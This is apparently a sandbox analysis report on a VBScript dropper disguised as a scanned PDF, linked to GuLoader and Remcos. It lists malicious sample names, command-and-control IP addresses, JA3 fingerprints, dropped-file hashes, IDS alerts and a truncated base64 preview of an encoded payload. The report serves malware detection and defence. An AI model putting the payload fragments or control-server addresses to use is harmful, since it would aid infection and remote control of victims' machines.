                                                            47#U0627.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                              178.237.33.50Order.vbsGet hashmaliciousRemcosBrowse
                                                              • geoplugin.net/json.gp
                                                              rIMG465244247443GULFORDEROpmagasinering.cmdGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • geoplugin.net/json.gp
                                                              1729445225fa0e5768d1d682409147d63519fc74f7a5fbd0985a9e3ffe794cd2fed7b2306d148.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                              • geoplugin.net/json.gp
                                                              duEsmKBlGr.exeGet hashmaliciousUnknownBrowse
                                                              • www.geoplugin.net/xml.gp?ip=SEU_IP
                                                              lA0Z0vjXfA.exeGet hashmaliciousUnknownBrowse
                                                              • www.geoplugin.net/xml.gp?ip=SEU_IP
                                                              172926254156daf582728190320bacb622ccd105a50446fe4e74bbec68be10e3a78d1b71e6763.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                              • geoplugin.net/json.gp
                                                              SKM_0001810-01-2024-GL-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • geoplugin.net/json.gp
                                                              SecuriteInfo.com.Variant.Ulise.323893.7366.1016.exeGet hashmaliciousUnknownBrowse
                                                              • www.geoplugin.net/xml.gp?ip=SEU_IP
                                                              Ibnh3BCQSQ.exeGet hashmaliciousUnknownBrowse
                                                              • www.geoplugin.net/xml.gp?ip=SEU_IP
                                                              nicetokissthebestthingsiwantotgetmebackwith.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                              • geoplugin.net/json.gp

                                                              Domains

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              s-part-0017.t-0009.t-msedge.nethttps://mlbmajorlossbuilders.hbportal.co/flow/66fdd3a6c031cc001f728831/view?hash=54079a777636a614d8d961b5b9a96a5fGet hashmaliciousUnknownBrowse
                                                              • 13.107.246.45
                                                              Thermo Fisher RFQ_TFS-1702.xlsGet hashmaliciousUnknownBrowse
                                                              • 13.107.246.45
                                                              https://www.google.co.nz/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Falinegrazielle.com%2FKaW12DtgTK%2F28KOjymVGMvsdxoOV3okyunn/S0pvbmVzQGtvbmlhZy1ncy5jb20=Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                              • 13.107.246.45
                                                              https://www.google.co.nz/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Falinegrazielle.com%2FKaW12DtgTK%2FCGJiV2TYiHhEjaWZAqcgtold/S0pvbmVzQGtvbmlhZy1ncy5jb20=Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                              • 13.107.246.45
                                                              https://www.google.co.nz/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Falinegrazielle.com%2FKaW12DtgTK%2FQVUPgqjgXFIkJFnzej6vlwSU/RENhcm5vdnNreUBrb25pYWctZ3MuY29tGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                              • 13.107.246.45
                                                              https://www.google.co.nz/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Falinegrazielle.com%2FKaW12DtgTK%2Fn8shpNHR5esID4MN5V6n2I56/RENhcm5vdnNreUBrb25pYWctZ3MuY29tGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                              • 13.107.246.45
                                                              index.htmlGet hashmaliciousUnknownBrowse
                                                              • 13.107.246.45
                                                              https://infinconsumer.lh1ondemand.com/Get hashmaliciousUnknownBrowse
                                                              • 13.107.246.45
                                                              PDWsetup.exeGet hashmaliciousGhostRatBrowse
                                                              • 13.107.246.45
                                                              https://docs.google.com/drawings/d/1rNIRSAgTQ9BvkQDgt6I1-bvyHw8Lwl60PfNx3hGnniY/preview?pli=128762876287628762876287628762876Get hashmaliciousUnknownBrowse
                                                              • 13.107.246.45
                                                              geoplugin.netOrder.vbsGet hashmaliciousRemcosBrowse
                                                              • 178.237.33.50
                                                              rIMG465244247443GULFORDEROpmagasinering.cmdGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • 178.237.33.50
                                                              1729445225fa0e5768d1d682409147d63519fc74f7a5fbd0985a9e3ffe794cd2fed7b2306d148.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                              • 178.237.33.50
                                                              172926254156daf582728190320bacb622ccd105a50446fe4e74bbec68be10e3a78d1b71e6763.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                              • 178.237.33.50
                                                              SKM_0001810-01-2024-GL-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • 178.237.33.50
                                                              nicetokissthebestthingsiwantotgetmebackwith.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                              • 178.237.33.50

                                                              ASNs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              CIRRUSTECHLTDCAImBm40hNZ2.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                              • 199.103.62.205
                                                              02_deb64ed.bin.exeGet hashmaliciousGuLoaderBrowse
                                                              • 199.103.62.205
                                                              Solicitud de Cotizaci#U00f3n #U2013 Cat#U00e1logo de Muestras2024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                              • 199.103.62.205
                                                              Richiesta di Offerta - Catalogo Campione.vbsGet hashmaliciousGuLoaderBrowse
                                                              • 199.103.62.205
                                                              #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                              • 199.103.62.205
                                                              Anfrage f#U00fcr ein Angebot - Musterkatalog.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                              • 199.103.62.205
                                                              47#U0627.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                              • 199.103.62.205
                                                              g5oo6DQ4pd.exeGet hashmaliciousUnknownBrowse
                                                              • 208.69.57.105
                                                              OQchDohurA.exeGet hashmaliciousRaccoon SmokeLoaderBrowse
                                                              • 192.228.108.27
                                                              ATOM86-ASATOM86NLOrder.vbsGet hashmaliciousRemcosBrowse
                                                              • 178.237.33.50
                                                              rIMG465244247443GULFORDEROpmagasinering.cmdGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • 178.237.33.50
                                                              1729445225fa0e5768d1d682409147d63519fc74f7a5fbd0985a9e3ffe794cd2fed7b2306d148.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                              • 178.237.33.50
                                                              duEsmKBlGr.exeGet hashmaliciousUnknownBrowse
                                                              • 178.237.33.50
                                                              lA0Z0vjXfA.exeGet hashmaliciousUnknownBrowse
                                                              • 178.237.33.50
                                                              172926254156daf582728190320bacb622ccd105a50446fe4e74bbec68be10e3a78d1b71e6763.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                              • 178.237.33.50
                                                              SKM_0001810-01-2024-GL-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • 178.237.33.50
                                                              SecuriteInfo.com.Variant.Ulise.323893.7366.1016.exeGet hashmaliciousUnknownBrowse
                                                              • 178.237.33.50
                                                              Ibnh3BCQSQ.exeGet hashmaliciousUnknownBrowse
                                                              • 178.237.33.50
                                                              nicetokissthebestthingsiwantotgetmebackwith.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                              • 178.237.33.50
                                                              OBE-EUROPEObenetworkEuropeSESKM_0001810-01-2024-GL-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • 193.187.91.216
                                                              SKU_0001710-1-2024-SX-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • 193.187.91.216
                                                              XClient.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                              • 194.32.149.14
                                                              bot_library.exeGet hashmaliciousUnknownBrowse
                                                              • 193.182.111.131
                                                              z2PO20240815.pdf.lnkGet hashmaliciousXWormBrowse
                                                              • 193.187.91.208
                                                              SecuriteInfo.com.Win32.PWSX-gen.24212.14364.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                              • 193.187.91.216
                                                              https://www.canva.com/design/DAGLxvJi_b4/I2I9hVBC94poYJRY8neUTg/view?utm_content=DAGLxvJi_b4&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousHTMLPhisherBrowse
                                                              • 194.32.144.119
                                                              REV-New Order 20240717^^^^^^^^^^^^^^^^^^.pif.exeGet hashmaliciousPureLog StealerBrowse
                                                              • 193.187.91.208
                                                              REV-New Order 20240717.pif.exeGet hashmaliciousRemcosBrowse
                                                              • 193.187.91.124
                                                              SecuriteInfo.com.AutoIt.Injector-JY.190.10007.exeGet hashmaliciousUnknownBrowse
                                                              • 193.182.111.41

                                                              JA3 Fingerprints

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              3b5074b1b5d032e5620f69f9f700ff0eOrder.vbsGet hashmaliciousRemcosBrowse
                                                              • 199.103.62.205
                                                              index.htmlGet hashmaliciousUnknownBrowse
                                                              • 199.103.62.205
                                                              Ricevuta_di_pagamento.vbsGet hashmaliciousGuLoaderBrowse
                                                              • 199.103.62.205
                                                              https://www.google.co.nz/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Falinegrazielle.com%2FKaW12DtgTK%2F28KOjymVGMvsdxoOV3okyunn/S0pvbmVzQGtvbmlhZy1ncy5jb20=Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                              • 199.103.62.205
                                                              https://www.google.co.nz/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Falinegrazielle.com%2FKaW12DtgTK%2Fn8shpNHR5esID4MN5V6n2I56/RENhcm5vdnNreUBrb25pYWctZ3MuY29tGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                              • 199.103.62.205
                                                              index.htmlGet hashmaliciousUnknownBrowse
                                                              • 199.103.62.205
                                                              TENDER ADDENDUM NO. 01.vbsGet hashmaliciousGuLoaderBrowse
                                                              • 199.103.62.205
                                                              IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • 199.103.62.205
                                                              RFQ 1307.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 199.103.62.205
                                                              Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbsGet hashmaliciousGuLoaderBrowse
                                                              • 199.103.62.205
                                                              37f463bf4616ecd445d4a1937da06e19Ricevuta_di_pagamento.vbsGet hashmaliciousGuLoaderBrowse
                                                              • 199.103.62.205
                                                              8VYDvQtXBH.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                              • 199.103.62.205
                                                              proforma.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                              • 199.103.62.205
                                                              IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • 199.103.62.205
                                                              file.exeGet hashmaliciousUnknownBrowse
                                                              • 199.103.62.205
                                                              FACTURA RAGOZA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                              • 199.103.62.205
                                                              Spedizione.vbsGet hashmaliciousUnknownBrowse
                                                              • 199.103.62.205
                                                              FACTURA DE PAGO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                              • 199.103.62.205
                                                              PAGO FRAS. AGOSTO 2024..exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                              • 199.103.62.205
                                                              rIMG465244247443GULFORDEROpmagasinering.cmdGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • 199.103.62.205

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                              Download File
                                                              Process:C:\Windows\System32\wscript.exe
                                                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                              Category:dropped
                                                              Size (bytes):71954
                                                              Entropy (8bit):7.996617769952133
                                                              Encrypted:true
                                                              SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                              MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                              SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                              SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                              SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                              Malicious:false
                                                              Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                              Download File
                                                              Process:C:\Windows\System32\wscript.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):328
                                                              Entropy (8bit):3.150184159866505
                                                              Encrypted:false
                                                              SSDEEP:6:kKK9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:NDnLNkPlE99SNxAhUe/3
                                                              MD5:C036470F3E5C884EE78B7B0DD6CCFA3A
                                                              SHA1:8B3CED6BBA971D4B67E994F6BBAB9ADEF4C9E47A
                                                              SHA-256:AC4A0E662C0DCF043637768FB2AEDC792789A1D77D01F757355D465092199DEE
                                                              SHA-512:7F948A9C1F70C6AAE45EA086B6CC94906BC7B79FBFE3FED46FA37272BA6C226386F2CD1A987BBB6CCDECA7C121535B3FDB8A40987109F2A9BA0B19EB453FA1C4
                                                              Malicious:false
                                                              Preview:p...... .............#..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\json[1].json

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):960
                                                              Entropy (8bit):5.007342357625525
                                                              Encrypted:false
                                                              SSDEEP:12:tkhEVBnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkL:qhEV1dRNuKyGX85jvXhNlT3/73clHWro
                                                              MD5:C0019D314FB1788D8FE8CBC65C3B6E7B
                                                              SHA1:CC5D5544960CF2DF1776E2BD23622373298DB55D
                                                              SHA-256:C6869361FD0119B2A0E2F96D90D40D92FF66EA71BC3829C0061C51630F3B75FF
                                                              SHA-512:192BB1AF8F9E1BCFF6AC5C7A4B8837677EF2A77BEE9FF78C47F2AB6EA246F98D3FDE8C327C8F594D2A5B4E5DDC76F4377F48E9567970D31B250D2A829B8A2096
                                                              Malicious:false
                                                              Preview:{. "geoplugin_request":"216.52.183.150",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7157",. "geoplugin_longitude":"-74",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:modified
                                                              Size (bytes):8003
                                                              Entropy (8bit):4.840877972214509
                                                              Encrypted:false
                                                              SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                              MD5:106D01F562D751E62B702803895E93E0
                                                              SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                              SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                              SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                              Malicious:false
                                                              Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):64
                                                              Entropy (8bit):1.1628158735648508
                                                              Encrypted:false
                                                              SSDEEP:3:Nlllul5mxllp:NllU4x/
                                                              MD5:3A925CB766CE4286E251C26E90B55CE8
                                                              SHA1:3FA8EE6E901101A4661723B94D6C9309E281BD28
                                                              SHA-256:4E844662CDFFAAD50BA6320DC598EBE0A31619439D0F6AB379DF978FE81C7BF8
                                                              SHA-512:F348B4AFD42C262BBED07D6BDEA6EE4B7F5CFA2E18BFA725225584E93251188D9787506C2AFEAC482B606B1EA0341419F229A69FF1E9100B01DE42025F915788
                                                              Malicious:false
                                                              Preview:@...e................................................@..........

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3hzcarqt.bi3.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tfwzfhji.lxz.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y0u35ivt.vqd.psm1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ymdhgdxb.fua.ps1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Roaming\Sttefiskenes.Tav

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                              Category:dropped
                                                              Size (bytes):499656
                                                              Entropy (8bit):5.848823387985694
                                                              Encrypted:false
                                                              SSDEEP:12288:4SvfUeB3ZpJuVbmFgR+G1PFPnuxyZBBNhUYf:4EtduVbmFgRdF1n8yBNhrf
                                                              MD5:9C5B82736C863DD8D126471D00EB7A3E
                                                              SHA1:3C2D70D4AE1EB5578213EF898AAA09D5528793DB
                                                              SHA-256:D912A2830162ABCA8C41F77A05B3A62E843FC359808F0091FCC4252EF10DA6DB
                                                              SHA-512:E5DD3DC4E2188F54EB12C73630BD9C756D803A07F5915233FCA0402D910CBCB31BD85A69174D482F3550213323CA6DEF3C7EDF8455F700C020BB696E4CE0823C
                                                              Malicious:false
                                                              Preview:cQGbcQGbu7OJFQBxAZvrApt6A1wkBHEBm+sCsAa5dqzl9XEBm+sCOTaBwaPFXstxAZtxAZuB6RlyRMHrAtvj6wKUz3EBm3EBm7pElGOKcQGbcQGb6wJ2i3EBmzHK6wL1bHEBm4kUC3EBm+sCovHR4nEBm3EBm4PBBOsCUrbrAkrMgfkNiYoFfMvrAhwP6wK7+ItEJATrAusY6wIUAonDcQGbcQGbgcOUfuAB6wLsdusCHIa6PKawmXEBm3EBm4HyF9blKXEBm+sCP2mB6itwVbDrArbD6wIODesCX7lxAZtxAZtxAZuLDBBxAZtxAZuJDBPrApWjcQGbQnEBm+sCcC+B+mBCBQB113EBm+sCniqJXCQMcQGbcQGbge0AAwAA6wJd+XEBm4tUJAjrAk3ScQGbi3wkBHEBm3EBm4nr6wJBGesCK+CBw5wAAABxAZtxAZtTcQGbcQGbakDrAtYc6wJXJonrcQGbcQGbx4MAAQAAACCjBesCgk1xAZuBwwABAABxAZvrAkdDU3EBm+sCNU6J63EBm3EBm4m7BAEAAHEBm3EBm4HDBAEAAOsCo4pxAZtTcQGbcQGbav9xAZtxAZuDwgXrAvC76wLdXTH2cQGbcQGbMclxAZvrAjlTixrrAtG86wJtSEHrAp+zcQGbORwKdfNxAZtxAZtG6wIdqXEBm4B8Cvu4dd5xAZtxAZuLRAr8cQGbcQGbKfDrAl1+6wKVUP/ScQGbcQGbumBCBQBxAZvrAorfMcBxAZtxAZuLfCQMcQGb6wJHu4E0B7VU4zVxAZtxAZuDwARxAZtxAZs50HXmcQGbcQGbifvrAsGb6wKDxv/X6wI/tnEBm11W4zW1bBaxQQ+FsGTdBvIwNxzKSmdknmjVTlZKqxxd7ogCtBg3HMpKIdS9QNVmVkqrHJ+77Rp5StmAykqrlsLg3QaMetJC3DS9QDu7qmLEQ56CE0OTfbR0aq44h9AE8vFZ47cBmFy08VnjWRTUB1NC

                                                              Static File Info

                                                              General

                                                              File type:ASCII text, with CRLF line terminators
                                                              Entropy (8bit):5.350099707536699
                                                              TrID:
                                                              • Visual Basic Script (13500/0) 100.00%
                                                              File name:Scanned_22C-6e24090516030.pdf.vbs
                                                              File size:27'621 bytes
                                                              MD5:1c78cc71bf8db131a33f156feff9ec4d
                                                              SHA1:af06e517411ac017868488d8a7173bb2d5d98012
                                                              SHA256:e4c5f96a9fbb32b0754fba2c4bd4a3773a77d8018b7aa5d572b067777de7165b
                                                              SHA512:868f20c758607c5e98310a437eb621246928564936ab6fb311f825ec0554b1181eacbddd9335b897fe85e488fc2feba69009a5f5c5539a76f605c22ae5948a32
                                                              SSDEEP:384:XrCiX5aUO2sEZovx4IhH4iwTrUtngui1/92lP8oyrZsqfQAU:Xe+pvyl4vT4o3/rm
                                                              TLSH:9DC21BC0CC423FD90DFB27B25F743560D4B0C4A65A3551697B2BA868782DBD2AC285DF
                                                              File Content Preview:Sub Evulge(Konvojtronbestigelser,Transiteranatoleallo,Filstrenggenman,Shelteunderskabe,Polleesammentrykni)..If Konvojtronbestigelser = cstr(2614147) Then ....Cirkusforestillinge41 = Space(69)....End If....while (Alkydmalingernesb<31)..Alkydmalingernesb =

                                                              File Icon

                                                              Icon Hash:68d69b8f86ab9a86

                                                              Network Behavior

                                                              Suricata IDS Alerts

                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                              2024-10-21T17:07:53.024386+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149973199.103.62.205443TCP
                                                              2024-10-21T17:07:56.585178+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.1149975193.187.91.21465253TCP
